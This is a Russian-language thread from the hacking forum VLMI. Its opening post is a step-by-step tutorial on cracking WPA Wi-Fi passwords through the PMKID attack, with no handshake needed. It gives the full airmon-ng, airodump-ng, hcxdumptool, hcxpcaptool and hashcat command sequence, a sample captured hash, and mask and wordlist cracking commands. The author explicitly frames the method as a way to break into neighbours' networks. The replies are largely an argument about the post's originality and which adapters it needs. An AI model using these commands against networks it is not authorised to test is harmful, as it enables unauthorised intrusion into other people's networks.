• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Взлом вафли без хендшейка

opt1k

Участник
Сообщения
28
Реакции
9
0 руб.
Не знаю была ли тут статья такая, возможно она просто под хайдом от меня, все же опишу способ на всякий случай.
Насколько мне известно способ был обнаружен во время тестирования алгоритма wpa3. Не требуется ждать клиента и деаутентифицировать, перехватывать хендшейк и прочее. На каких моделях роутеров данный способ работает точно не могу сказать, но в моем окружении из 4х точек с более менее стабильным сигналом, я захватил две. Больше мне и не надо(основной + запасной каналы).

Подготовка
Устанавливаем на нашу машину(возможно уже у кого то есть часть этих инструментов из коробки):
1. airmon-ng + airodump-ng http://aircrack-ng.org/
2. hcxdumptool https://github.com/ZerBea/hcxdumptool
3. hcxpcaptool https://github.com/ZerBea/hcxtools
4. hashcat https://hashcat.net/hashcat/

По поводу установки расписывать не буду, мануалов полно. Все дальнейшие действия я производил в Debian, поэтому в других дистрах и винде команды могут отличаться, но принцип остается тем же.


Приступим
Картинки взяты с гугла, поэтому сильно не ориентируйтесь по ним.

Первым делом запустим нашу карту в режим монитора.
Bash:
sudo airmon-ng start wlan0
Имя своего wifi интерфейса можно посмотреть в набрав команду ifconfig(для меня это wlan0).
Далее начинаем захват пакетов с помощью утилиты airodump.
Bash:
sudo airodump-ng wlan0mon
wlna0mon - интерфейс монитора, который появится в списке ifconfig, после старта первой команды.
Видим следующее
dump.png
Из списка выбираем более или менее устойчивый.
Далее сохраняем его BSSID
Bash:
echo "98DED0EF7060" > filter.txt
Обратите внимание что BSSID мы записываем без ":"

Ну и приступим к основному.
Первым шагом мы должны получить pmkid точки. Делается это так
Bash:
sudo hcxdumptool -o hash -i wlan0mon --filterlist=filter.txt --filtermode=2 --enable_status=1,2
Что это за ключи и какие значения они могут принимать, вы можете почитать набрав hcxdumptool -h.
В кратце основные --o hash - тут сохранится собственно сам pmkid. --i wlan0mon - интерфейс мониторящей карты. --filterlist - наш сохраненный bssid.
После того как ввели команду увидите примерно следующее
pmkid.png
Как только увидим надпись
Bash:
[FOUND PMKID]
Можем смело жать CTRL + C и приступать к расшифровке.
Приведем наш pmkid в удобочитаемый вид для hashcat
Bash:
sudo hcxpcaptool -z hashtocrack hash
Если набрать
Bash:
cat hashtocrack
То получим примерно следующее
Bash:
ef2115548399c67c69639f04feaeebdb:98ded0ef7060:28565aba7224
Далее заряжаем наш hashcat
Команда для перебора численых паролей из 8 цифр
Bash:
sudo hashcat -m 16800 hashtocrack -a 3 -w 3 '?d?d?d?d?d?d?d?d' --force
'?d?d?d?d?d?d?d?d' - это собственно маска. По маскам можете почитать доки hashcat
Комнда для перебора по словарю
Bash:
sudo hashcat -m 16800 hashtocrack wordlist.txt --force
Свой hashcat я настроил на брут GPU поэтому по маске из 8 цифр это 10кк паролей, перебирает около часа. По словарям тоже очень быстро работает.
Надеюсь статья была полезной. Хорошей охоты на соседей!
 

Вложения

  • dump.jpg
    dump.jpg
    41,4 KB · Просмотры: 38

XDG12

Местный
Сообщения
123
Реакции
234
0 руб.
Что ищем, для чего ищем непонятно... Смысл этого всего, если мы и хэндшейк через хэшкат расшифруем? Плюс не забывайте друзья, что для мониторинга сети необходим спец адаптер поддерживающий такую возможность...
 

opt1k

Участник
Сообщения
28
Реакции
9
0 руб.
Что ищем, для чего ищем непонятно... Смысл этого всего, если мы и хэндшейк через хэшкат расшифруем? Плюс не забывайте друзья, что для мониторинга сети необходим спец адаптер поддерживающий такую возможность...
Ты прочитал пару манов о взломе и думаешь, что дохера знаешь? Любая wifi карта в ноуте работает в режиме монитора, по поводу хендшейка, ты можешь ждать клиента до усрачки чтобы перехватить его. В моем же мане он не нужен. Если тебе что то непонятно учи матчасть
 

XDG12

Местный
Сообщения
123
Реакции
234
0 руб.
Ты прочитал пару манов о взломе и думаешь, что дохера знаешь? Любая wifi карта в ноуте работает в режиме монитора, по поводу хендшейка, ты можешь ждать клиента до усрачки чтобы перехватить его. В моем же мане он не нужен. Если тебе что то непонятно учи матчасть
Эмммм, не любая))Для вардрайвинга подходит далеко не любой вай фай адптер)
 
Сообщения
76
Реакции
62
0 руб.
Ты прочитал пару манов о взломе и думаешь, что дохера знаешь? Любая wifi карта в ноуте работает в режиме монитора, по поводу хендшейка, ты можешь ждать клиента до усрачки чтобы перехватить его. В моем же мане он не нужен. Если тебе что то непонятно учи матчасть
Молодец!хороший пост.
 
  • Мне нравится
Реакции: Form

XDG12

Местный
Сообщения
123
Реакции
234
0 руб.
Да какой вардрайвинг, ты соседа ломаешь, а не колесишь по городу собирая точки. Учи матчасть братан.
взлом wi fi и есть вардрайвинг. Какая разница ломаешь ты соседский wi fi или получаешь доступ к корпоративной сети, разницы нет, в любом случае нужен адаптер с поддержкой режима монитора. Прежде чем советовать учить матчасть тебе самому неплохо было бы ознакомится с тем что эта фраза означает. Если ты такой умный, то не стоило бы брать картинки с гугла и вставлять их сюда, а сделать скрины рс и выложить их сюда, учитывая что даже этого ты сделать не смог, я сильно сомневаюсь что ты умеешь пользоваться утилитами aircrack, airmon и тд... Плюс ко всему ты даже не знаешь что необходимо для взлома вай фай...
Все дальнейшие действия я производил в Debian, поэтому в других дистрах и винде команды могут отличаться, но принцип остается тем же.
Команды у утилит одинаковые, меняется имя интерфейса в зависимости от дистрибутива, за исключением команды ifconfig...
Из списка выбираем более или менее устойчивый.
расписал бы, что значит более менее устойчивый, раз у тебя целый "свой ман" взлома вай фай
Первым шагом мы должны получить pmkid точки
И тут бы объяснил чего делаем
Можем смело жать CTRL + C и приступать к расшифровке
очень "профессионально", ты и весь текст так сюда запилил?))
Команда для перебора численых паролей из 8 цифр
Почему из 8? Разве точка доступа не может иметь пароль длинной больше 8 символов? У меня лично стоит пароль из 14)
'?d?d?d?d?d?d?d?d' - это собственно маска. По маскам можете почитать доки hashcat
Ну раз начал растолковывать так распиши что значит каждый аргумент
sudo hashcat -m 16800 hashtocrack -a 3 -w 3 '?d?d?d?d?d?d?d?d' --force
почему ты выбрал хэш именно WPA-PMKID-PBKDF2 а не WPA-PMKID-PMK??? тоже можно было бы расписать))
Свой hashcat я настроил на брут GPU поэтому по маске из 8 цифр это 10кк паролей, перебирает около часа
там еще и настраивать надо?) Скорость перебора мой друг зависит от мощностей железа))
По словарям тоже очень быстро работает
скорость перебора одинаковая, перебор по словарю примичателен тем, что в нем может содержаться тот самый пароль, что позволит затратить меньше времени на его подбор, чем полным перебором, из-за того что перебираемых вариантов меньше))
Учитывая все выше мной перечисленное, и стиль твоих ответов в теме, я сомневаюсь что ты сам понимаешь написаное. Простой копипаст, без вникания в тему. Киди!
 

opt1k

Участник
Сообщения
28
Реакции
9
0 руб.
взлом wi fi и есть вардрайвинг. Какая разница ломаешь ты соседский wi fi или получаешь доступ к корпоративной сети, разницы нет, в любом случае нужен адаптер с поддержкой режима монитора. Прежде чем советовать учить матчасть тебе самому неплохо было бы ознакомится с тем что эта фраза означает. Если ты такой умный, то не стоило бы брать картинки с гугла и вставлять их сюда, а сделать скрины рс и выложить их сюда, учитывая что даже этого ты сделать не смог, я сильно сомневаюсь что ты умеешь пользоваться утилитами aircrack, airmon и тд... Плюс ко всему ты даже не знаешь что необходимо для взлома вай фай...
Команды у утилит одинаковые, меняется имя интерфейса в зависимости от дистрибутива, за исключением команды ifconfig...

расписал бы, что значит более менее устойчивый, раз у тебя целый "свой ман" взлома вай фай

И тут бы объяснил чего делаем

очень "профессионально", ты и весь текст так сюда запилил?))

Почему из 8? Разве точка доступа не может иметь пароль длинной больше 8 символов? У меня лично стоит пароль из 14)

Ну раз начал растолковывать так распиши что значит каждый аргумент

почему ты выбрал хэш именно WPA-PMKID-PBKDF2 а не WPA-PMKID-PMK??? тоже можно было бы расписать))

там еще и настраивать надо?) Скорость перебора мой друг зависит от мощностей железа))

скорость перебора одинаковая, перебор по словарю примичателен тем, что в нем может содержаться тот самый пароль, что позволит затратить меньше времени на его подбор, чем полным перебором, из-за того что перебираемых вариантов меньше))
Учитывая все выше мной перечисленное, и стиль твоих ответов в теме, я сомневаюсь что ты сам понимаешь написаное. Простой копипаст, без вникания в тему. Киди!
А как же я по твоему написал этот ман? Ну и к киди) Я вообще то кодер и официально работаю программистом)
 

opt1k

Участник
Сообщения
28
Реакции
9
0 руб.
взлом wi fi и есть вардрайвинг. Какая разница ломаешь ты соседский wi fi или получаешь доступ к корпоративной сети, разницы нет, в любом случае нужен адаптер с поддержкой режима монитора. Прежде чем советовать учить матчасть тебе самому неплохо было бы ознакомится с тем что эта фраза означает. Если ты такой умный, то не стоило бы брать картинки с гугла и вставлять их сюда, а сделать скрины рс и выложить их сюда, учитывая что даже этого ты сделать не смог, я сильно сомневаюсь что ты умеешь пользоваться утилитами aircrack, airmon и тд... Плюс ко всему ты даже не знаешь что необходимо для взлома вай фай...
Команды у утилит одинаковые, меняется имя интерфейса в зависимости от дистрибутива, за исключением команды ifconfig...

расписал бы, что значит более менее устойчивый, раз у тебя целый "свой ман" взлома вай фай

И тут бы объяснил чего делаем

очень "профессионально", ты и весь текст так сюда запилил?))

Почему из 8? Разве точка доступа не может иметь пароль длинной больше 8 символов? У меня лично стоит пароль из 14)

Ну раз начал растолковывать так распиши что значит каждый аргумент

почему ты выбрал хэш именно WPA-PMKID-PBKDF2 а не WPA-PMKID-PMK??? тоже можно было бы расписать))

там еще и настраивать надо?) Скорость перебора мой друг зависит от мощностей железа))

скорость перебора одинаковая, перебор по словарю примичателен тем, что в нем может содержаться тот самый пароль, что позволит затратить меньше времени на его подбор, чем полным перебором, из-за того что перебираемых вариантов меньше))
Учитывая все выше мной перечисленное, и стиль твоих ответов в теме, я сомневаюсь что ты сам понимаешь написаное. Простой копипаст, без вникания в тему. Киди!
Ну можешь тогда предоставить ресурс копипаста? Сам писал всё
 

XDG12

Местный
Сообщения
123
Реакции
234
0 руб.
Ну можешь тогда предоставить ресурс копипаста? Сам писал всё
Я не рекламирую сторонние ресурсы
https://hackware.ru/?p=6672
https://www.wifi-libre.com/topic-1156-demostracion-ataque-pmkid-explicado-paso-a-paso-page-2.html
Возможно просмотренные видео вариантов много и тратить время на поиск и выяснение источника информации я не буду, вот два ресурса где высветились аналогичные статьи и обсуждение на форуме. Напомню что простой рерайт тоже является копипастом по своей сути.
И человек, НЕ знающий что такое вардрайвинг, НЕ знающий о том, что для взлома вай фай подходит НЕлюбой вай фай адаптер, заявляет мне о том, что он достаточно хорошо знаком с методами атак на такие сети(учитывая то, что отправляешь меня учить матчасть даже не зная что это такое) Также тс в течении разговора никак не подтвердил свои знания в этой области, а только лишь пустые заявления из разрада "я кодер", "работаю программистом" . Допускаю возможность того что ты сам пробовал такой вид атаки, но друг, ты не понимаешь в этом совсем ничего, это видно из разговора. И я считаю, что человек пишущий мануал или статью, должен по крайней мере разобраться хорошо в теме. Желания и времени у меня тратить на весь этот диалог вовсе нет. Поэтому успехов и удачи!
Извинияюсь за ошибки, совсем неграмотный я))
 

opt1k

Участник
Сообщения
28
Реакции
9
0 руб.
взлом wi fi и есть вардрайвинг. Какая разница ломаешь ты соседский wi fi или получаешь доступ к корпоративной сети, разницы нет, в любом случае нужен адаптер с поддержкой режима монитора. Прежде чем советовать учить матчасть тебе самому неплохо было бы ознакомится с тем что эта фраза означает. Если ты такой умный, то не стоило бы брать картинки с гугла и вставлять их сюда, а сделать скрины рс и выложить их сюда, учитывая что даже этого ты сделать не смог, я сильно сомневаюсь что ты умеешь пользоваться утилитами aircrack, airmon и тд... Плюс ко всему ты даже не знаешь что необходимо для взлома вай фай...
Команды у утилит одинаковые, меняется имя интерфейса в зависимости от дистрибутива, за исключением команды ifconfig...

расписал бы, что значит более менее устойчивый, раз у тебя целый "свой ман" взлома вай фай

И тут бы объяснил чего делаем

очень "профессионально", ты и весь текст так сюда запилил?))

Почему из 8? Разве точка доступа не может иметь пароль длинной больше 8 символов? У меня лично стоит пароль из 14)

Ну раз начал растолковывать так распиши что значит каждый аргумент

почему ты выбрал хэш именно WPA-PMKID-PBKDF2 а не WPA-PMKID-PMK??? тоже можно было бы расписать))

там еще и настраивать надо?) Скорость перебора мой друг зависит от мощностей железа))

скорость перебора одинаковая, перебор по словарю примичателен тем, что в нем может содержаться тот самый пароль, что позволит затратить меньше времени на его подбор, чем полным перебором, из-за того что перебираемых вариантов меньше))
Учитывая все выше мной перечисленное, и стиль твоих ответов в теме, я сомневаюсь что ты сам понимаешь написаное. Простой копипаст, без вникания в тему. Киди!
О Боже, ты просто решил доебаться. Гугли бро, все в открытом доступе. Ман рабочий, если не можеш его применить, значит руки из одного места
 

XDG12

Местный
Сообщения
123
Реакции
234
0 руб.
О Боже, ты просто решил доебаться. Гугли бро, все в открытом доступе. Ман рабочий, если не можеш его применить, значит руки из одного места
1 - бессмысленный коммент, я сам скидывал сюда ссылки и ты мне еще говоришь гугли, рукалицо просто
2- причем здесь применить, ты вообще читал что я тебе писал
3 - я писал по факту твоих слов
4 - ты бы еще через год ответил
 

opt1k

Участник
Сообщения
28
Реакции
9
0 руб.
Странный ты. Просто решил перечитать сообщения, ты редактировал. Вот и решил ответить. Ну если грамотный такой, чего сам то ничего не напишешь?
 

opt1k

Участник
Сообщения
28
Реакции
9
0 руб.
1 - бессмысленный коммент, я сам скидывал сюда ссылки и ты мне еще говоришь гугли, рукалицо просто
2- причем здесь применить, ты вообще читал что я тебе писал
3 - я писал по факту твоих слов
4 - ты бы еще через год ответил
Я могу аргументировать каждый шаг, а это просто ман для быстрого взлома. Если есть вопросы, пиши
 

XDG12

Местный
Сообщения
123
Реакции
234
0 руб.
Ну плохо читаешь даже если ссылки найти не можешь
Написать я должен что?
 

XDG12

Местный
Сообщения
123
Реакции
234
0 руб.
конь с х*ем
Ты вот вместо того чтобы разводить срач непонятный, лучше бы сделал выводы и сделал бы статью более информативной
Кароч путного ты здесь ничего не сказал, адьесссс

P.S. а ты кто?))
 

opt1k

Участник
Сообщения
28
Реакции
9
0 руб.
конь с х*ем
Ты вот вместо того чтобы разводить срач непонятный, лучше бы сделал выводы и сделал бы статью более информативной
Кароч путного ты здесь ничего не сказал, адьесссс

P.S. а ты кто?))
/del
 
Последнее редактирование:

opt1k

Участник
Сообщения
28
Реакции
9
0 руб.
конь с х*ем
Ты вот вместо того чтобы разводить срач непонятный, лучше бы сделал выводы и сделал бы статью более информативной
Кароч путного ты здесь ничего не сказал, адьесссс

P.S. а ты кто?))
Добавишь, затру, а то спамеры достали
 
Сверху Снизу